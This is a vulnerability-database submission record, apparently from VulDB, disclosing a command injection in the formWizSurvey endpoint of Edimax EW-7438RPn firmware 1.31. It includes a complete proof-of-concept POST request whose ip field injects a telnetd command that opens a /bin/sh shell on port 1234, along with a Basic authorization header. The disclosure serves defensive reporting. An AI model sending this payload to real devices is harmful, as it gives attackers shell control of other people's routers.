| 标题 | Edimax EW-7438RPn 1.31 Command Injection |
|---|
| 描述 | We found a command injection vulnerability in an Edimax extender with recently released firmware, which allows remote attackers to execute arbitrary OS commands via a crafted request.In formWizSurvey function, ip、mask、gateway is directly passed by the attacker, so we can control the ip、mask、gateway to attack the OS.
POST /goform/formWizSurvey HTTP/1.1
Host: 192.168.0.4
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
Origin: http://192.168.0.4
Authorization: Basic YWRtaW46MTIzNA==
Connection: keep-alive
Referer: http://192.168.0.4/conn_test_wep.asp
Cookie: language=16
Upgrade-Insecure-Requests: 1
Priority: u=0, i
set_vxd_ip=1&ip=`telnetd -l /bin/sh -p 1234`&mask=x.x.x.x&gateway=192.168.0.1&NEXT=%E4%B8%8B%E4%B8%80%E6%AD%A5 |
|---|
| 来源 | ⚠️ https://github.com/wudipjq/my_vuln/blob/main/Edimax/vuln_5/5.md |
|---|
| 用户 | Bond_yes (UID 89043) |
|---|
| 提交 | 2026-04-27 07時43分 (1 月前) |
|---|
| 管理 | 2026-05-23 10時32分 (26 days later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 365310 [Edimax EW-7438RPn 直到 1.31 webs /goform/formWizSurvey ip/mask/gateway 权限提升] |
|---|
| 积分 | 20 |
|---|